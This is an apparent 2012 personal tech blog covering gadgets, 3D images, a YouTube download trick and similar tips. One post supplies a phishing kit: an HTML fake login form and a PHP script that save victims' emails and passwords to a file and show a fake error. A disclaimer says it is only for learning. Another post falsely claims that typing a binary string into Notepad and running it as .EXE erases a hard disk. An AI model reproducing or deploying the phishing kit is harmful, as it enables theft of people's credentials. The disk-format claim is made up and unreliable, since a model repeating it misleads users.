Thursday, December 6, 2012

Youtube download without a downloader

The simplest way to download your youtube video is by replacing the "WWW." with "ss"

For Example:

if your youtube link is https://www.youtube.com/watch?v=Ziypn8hVxMU&feature=g-all-u
then your download link will be https://ssyoutube.com/watch?v=Ziypn8hVxMU&feature=g-all-u

what this actually does is, take you to savefrom.net from where you can download your video.


Friday, November 23, 2012

Celluon Magic Cube

Cube Laser Virtual Keyboard


Cube Laser Virtual Keyboard
The Cube Laser Virtual Keyboard -Celluon Magic Cube Laser Projection Keyboard and Touchpad- is a tiny device that laser-projects a keyboard on any flat surface. Then you can type accompanied by key click sounds.
  This is a revolutionary device is something that you can show to your colleagues.

It is compatible with iPad, iPhone or laptop, has a QWERTY layout and is available at the price of $125

The Celluon laser keyboard acts exactly like any other "ordinary" keyboard: A direction technology based on an optical recognition mechanism enables the user to tap on the projected key images, while producing real tapping sounds.

Cube Laser Virtual Keyboard

To the "Surface"


Microsoft Surface is a series of tablets designed and marketed by Microsoft. 

The Surface comes in two versions: one with Windows RT and another with Windows 8 Pro. The Windows RT model uses an ARM CPU, while the Windows 8 Pro model will use an Intel CPU.  Both models are able to install new applications via the Windows Store, however only the Windows 8 Pro model allows the installation of traditional third-party desktop programs.
                                                          

The Microsoft Surface line features VaporMg, a molded magnesium casing that houses Surface's components paired with a Physical Vapor Deposition(PVD) finish. Both models have two 720p HD front- and rear-facing cameras, and a "kickstand" beneath which is a  hidden microSDXC port. The "kickstand" allows the device to be standd up at an angle for hands-free viewing. It has 2GB memory, Geforce ULP graphics in surface whereas 4 GB memory and Intel HD Graphics 4000 in surface pro.
  
Price tags:
  • Surface with Windows RT, 32 GB (no keyboard cover): $499/£399
  • Surface with Windows RT, 32 GB with Black Touch Cover: $599/£479
  • Surface with Windows RT, 64 GB with Black Touch Cover: $699/£559
  • Surface Touch Cover (white, red, black, cyan, or pink): $119/£99.99
  • Surface Type Cover: $129/£109.99

Surface is a very exciting piece of hardware that Microsoft has launched after kinect. The slim tablet cum PC is a great hardware to own. I would definitely like to get one of those but looking at the price that Microsoft has tagged it. I don't think it is worth paying $500.

 I would love to own one of them only if somebody sponsored me one.

Monday, November 19, 2012

Dropbox

 How big is Dropbox??
You probably might have heard about DROPBOX. I think this company is one of the most rapidly growing company in the world.
Drew Houston the founder and his co-founder Arash Ferdowsi had idea for drop box in 2008 and 4 years
later the idea turned into a big company.

 Some interesting facts about Dropbox.

-Billion files saved each 24 hours.
-about $500 million revenue.
-Has 100 million users, which is double from that of the last year.
-96% of people use it for free
-Has 250 employee. It although startted with 90 employees.
-Its value was guessed over $4 billion a year ago and a year later, its value is rumored
to be much higher.

phishing(code)


This post is only for teaching and learning process. Anything you do with the codes is your own responsibility. So, plz don't try phishing on others because it is an illegal act.

The code for phishing is a very simple HTML and PHP combination.

The page that you will be viewing or the user will be viewing is the HTML page and we will use simple PHP code for combining the info into a file name file.

1. first create a HTML file. Its upto your creativity, how you create your website. For the demonstration I will use a simple login page.

<p align=center><img src="path of your image/logo">
</p>
<h1 align= center>The header goes here</h1>
<form action="phishing.php" method="post">
email address:<input type="text" name="email"/></br>
password:<input type="password" name="pwd"/>

<input type="submit" value="submit"/>
</form>



2. Now create a PHP file called phishing.php and type in the following code.
     This code written in PHP works with the previously entered login information and combines it into a file name "file".

<?php
$email=$_post['email'];
$password=$_post['pwd'];
$data=$email.','. $password;
$file=file;

file_put_contents($file,$data. PHP_EOL,FILE_APPEND);
print '<p align=center><img src="logo/image location">
</p>
<h1 align= center>The header goes here</h1>

</br>
<h1> error mssg stating some error so that user has to come and try again later as it is obvious that you are using the website only for phishing.</h1>
?>

3. The information will be saved in a file named "file". So, open the file and see whats inside then you may delete it because phishing out others information is illegal.

I hope you have understood the core of phishing.
Plz don't try doing this to others.

Sunday, November 18, 2012

Hacking (Phishing)

First I would like to like to notify all my viewers that, this post is only to get knowledge about phishing. Please don't try this as it is an illegal act.

The term phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.
 
As in fishing, you provide a bait and the fish itself comes to your bait and gets hooked.
Phishing is s similar process where the attacker pretends to be a trust worthy person or an organization in most cases and makes you give away your personal identities to them.

Most of us might have heard of facebook hacking. Phishing through website is its main reason. Attackers make similar website as facebook login page and even direct them to their home page using their own fake websites. This is the most probable case of losing your identity.

List of phishing techniques

Phishing
Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
Spear Phishing
Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success.
Clone Phishing
A type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version to the original.
This technique could be used to pivot (indirectly) from a previously infected machine and gain a foothold on another machine, by exploiting the social trust associated with the inferred connection due to both parties receiving the original email.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.


I'll discuss about some of the examples of phishing website along with their codes in my next post. So, don't forget to follow me.

Get free flash animated widgets.

Get free flash animated widgets.

If you are a lazy graphic designer or you don't know how to make your own animations. One of the best site for a free animation is http://www.flashvortex.com/

This website enables you to create free Menus, Banners, Widgets, Buttons and other many flash animated modules for your website. 



I think you will love this website for free animations.

Friday, November 16, 2012

Your own 3D image



While stereoscopic effects like Cyan/Red 3D are often created with fancy photography tricks, we’ll be creating one today with simple trick image editing. Dive right on in and see how simple it can be, with a simple version for Photoshop beginners, and an optional second part for users that want to give their image a little more oomph. Keep reading!

A Simple Red & Cyan 3D Effect
The technical term for a 3D image is an Anaglyph, which are usually created by photographing a subject from two separate vantage points, then combining the images. Today, we won’t be doing that, but we will achieve the same effect by digging through our image channels. Open up a worthy image and let’s get going!

For this demonstration i will be using Adobe photoshop, but you can use any image editing software you like.
 Step 1: Take two photos of anything you like,one for the right eye and another some distance apart for the left eye.


Step 2: convert both of your images to Grayscale.
Image>mode>grayscale.


 Step 3: Convert the left eye image back to RGB.
 Image>mode>RGB color. 

Step 4: Enable the channel window( i.e if it is not), then select the green and blue colors only by holding the shift key.



Step 5: Now, copy and paste the right eye image on top of the left eye image and enable the RGB channel.  After this you might see some outlines of red in your image.

Step 6: Now
reposition and give some final touches to the images so as to give it a perfect 3D look.

Monday, November 12, 2012

3D


How 3D works?
We might all have had watched a 3D movie by the date and if not then I suggest you get a ticket very soon. Transformers was my best experience of a 3D movie till date. Besides, watching those movies has anyone ever wondered how it is possible to view 3D just by putting on some old fashioned funky glasses??

Let us see for ourselves,  how 3D works.
The answer is pretty simple and pretty amazing as well. The reason of us being able to see 3D is because of our two eyes. 3D might
not be possible with a single eye. The main reason is the gap between our two eyes, that small distance helps us to calculate the exact position of an object that we see around us, the calculated output is termed as 3D image. The separation of our eyes makes us take in two different images at a time. The two different images that we see from our two eyes are processed by our mind to make it look like one 3D-image.

Anaglyph 3D is the name given to the stereoscopic 3D effect achieved by means of encoding each eye's image using filters of different (usually chromatically opposite) colors, typically red and cyan. Anaglyph 3D images contain two differently filtered colored images, one for each eye. When viewed through the "color coded" "anaglyph glasses", each of the two images reaches one eye, revealing an integrated stereoscopic image. The visual cortex of the brain fuses this into perception of a three dimensional scene or composition.

SEE FOR YOURSELF!!
First close one of your eyes. Try holding index finger of your one hand out(parallel to the ground) and tip of your another index finger opposite to the first one at some distance. Now try touching two tips of your index finger without opening your eyes. It doesn’t seem to be done at your will or is it????

The simple reason for that is, we are not able to see 3D with our one eye open. The above mentioned experiment can easily be done with both eyes open.


We, already know that whatever we see is in 3D, at least!!
Many of us might have wondered how this might work using a 3D glass. The magic is not within the glasses, it is the image and the glasses together which enables us to visualize 3D image. The concept of making a 3D image is same as real life 3D viewing experience.
First, two images are captured, one in perspective of one eye and other from a little distance as an image for another eye. First the image colors are manipulated and then they are combined together using a photo editing software such that the images overlapping gives us a sensation of 3D-image.
But, how 3D works in case of the red and blue cyan glasses?
 
The logic is same. But, the difference arises when two of the images are edited and compiled. One of the image is made focusing the red color of the image and another focusing the blue. Those two images are combined together using a photo editing software as our brain does for us. Hence, a 3D image is created.
Now, if we think about the glasses. One of the lens is made of red material and another from blue. The logic of using the red and blue colored lenses is that it filters one of either blue or red image from the combined image. When we put the glass on, the blue colored lens filters the blue image and the red filters the red image. Hence, two seperate images are delivered to our eyes. Now, our brain does the compiling and we are able to see a 3D image.
As we have understood the logic behind a 3D image, I’ll try and teach how a simple 3D image for a red and blue cyan glass can be made in my next post. I hope you will enjoy making some of your own 3D images then.

Sunday, October 14, 2012

What is kinect??


You all might heard about KINECT.
Kinect is one of the most revolutionizing piece of hardware that i have heard about in few years.Kinect is a motion sensing input device by Microsoft for the Xbox 360 video game console and Windows PCs.

Have you ever thought of playing some games without any consoles, your hands are your stylus. All the gestures you make is only what you need. Who might have thought it few years back that your motions could be sensed and the device can understand it . Not, just your gestures, but it can work to your voice commands as well.

Kinect builds on software technology developed internally by Rare, a subsidiary of Microsoft Game Studios owned by Microsoft, and on range camera technology by Israeli developer PrimeSense, which developed a system that can interpret specific gestures, making completely hands-free control of electronic devices possible by using an infrared projector and camera and a special microchip to track the movement of objects and individuals in three dimension. This 3D scanner system called Light Coding employs a variant of image-based 3D reconstruction.

The Kinect sensor is a horizontal bar connected to a small base with a motorized pivot and is designed to be positioned lengthwise above or below the video display. The hardware device has a RGB camera, depth sensor and multi-array microphone.

Boost Your WiFi Signal Using Only a Beer Can

Boost Your WiFi Signal Using Only a Beer Can

 This actually is not my original one but i found it to be very interesting.It is good enough to be tried as it boosts the wifi speed up to 2-4 times.
 
These instructions came to us via WikiHow and we think they are most definitely worth checking out. But here is the most important question: what kind of beer will you use?

For this project you are going to need scissors, a utility knife, some adhesive putty and an empty beer can. More than one empty beer can is acceptable but don’t kid yourself, the router only needs the one.


The first step is to wash out your empty beer can, unless of course said beer is a can of Pabst Blue Ribbon. If it is PBR, promptly go drink a better beer. You really should be ashamed of yourself.
Once the can has dried, you will want to remove it’s pull tab.
READ MORE: Iron Age Beer-Making Operation Discovered
Only perform this next step if you have not been drinking. Using the utility knife, saw off the bottom of the can. Chances are your can will not have a red dotted line. If you see one, put down the knife…you’ve had too much beer.


You’ll notice in the above step that the can’s pull tab has returned. Clearly, there are only two possible reasons for this. One, you are really drunk and you never removed the tab in the first place. Or–the more likely answer–beer cans can regenerate themselves.



It’s the home stretch! You just need to attach your modded beer can to the wifi router. Hopefully no other parts of the can have actually grown back. You now have beer-fi!
So, what kind of beer did you use?

 

Friday, June 1, 2012


FORMATTING YOUR HARD DISK WITH A SIMPLE BINARY CODE 

Open Notepad and type:
a) Code : 01001011000111110010010101010101010000011111100000
b) Save As it as  anything.EXE
c) Run it. Beware that the entire HDD will be erased





Wednesday, May 30, 2012

FOR A CHANGE::  TRICK FOR YOUR NOKIA CELLPHONES
FEW OF MORE CODES FOR NOKIA
Codes :
1) *#06# For checking IMEI(international Mobile Equipment Identity)
2) *#7780# Reset to factory settings
3) *#0000# To view software version
4) *#2820# Bluetooth device address
5) *#746025625# Sim clock allowed status
6) #pw+1234567890+1# Shows if ur sim as any restrictions





file recovery


Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...

For all those folks,
Here is the solution

Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.


1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.

2)
When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.

3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).